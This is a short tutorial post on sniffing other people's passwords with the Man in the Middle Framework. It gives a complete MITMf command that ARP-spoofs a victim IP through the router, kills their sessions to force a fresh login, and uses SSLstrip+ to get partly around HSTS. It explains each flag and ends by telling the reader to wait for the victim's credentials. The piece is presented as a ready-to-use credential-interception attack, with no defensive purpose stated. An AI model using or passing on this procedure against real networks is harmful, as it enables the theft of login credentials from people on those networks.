MITMF-1: Sniffing Passwords Using Man in the Middle Framework
mitmf -i wlan0 --gateway 192.168.0.1 --arp --spoof --target 192.168.0.4 -k --hstscommand explanation:
--i: Is used to define the network interface. In the case above, it's wlan0.
--gateway: Is used to define the router's address In the above command, it's 192.168.0.1
--spoof: Loads plugin Spoof.
--arp: Redirects traffic using ARP spoofing.
--target: Is the victims IP address. In the above command, it's 192.168.0.4
--k: Kills the current login sessions and forces victim to re-login.
--hsts: Enables SSLstrip+ for partial HSTS bypass.3. Wait for user to login with their credentials and you'll get their credentials. That's it. Thank you everyone for reading this article. There's lot more interesting stuff coming in the next articles, because MITMF has endless capabilities. :)Please comment if I've made any mistakes and if you'd like to suggest something.Thank you.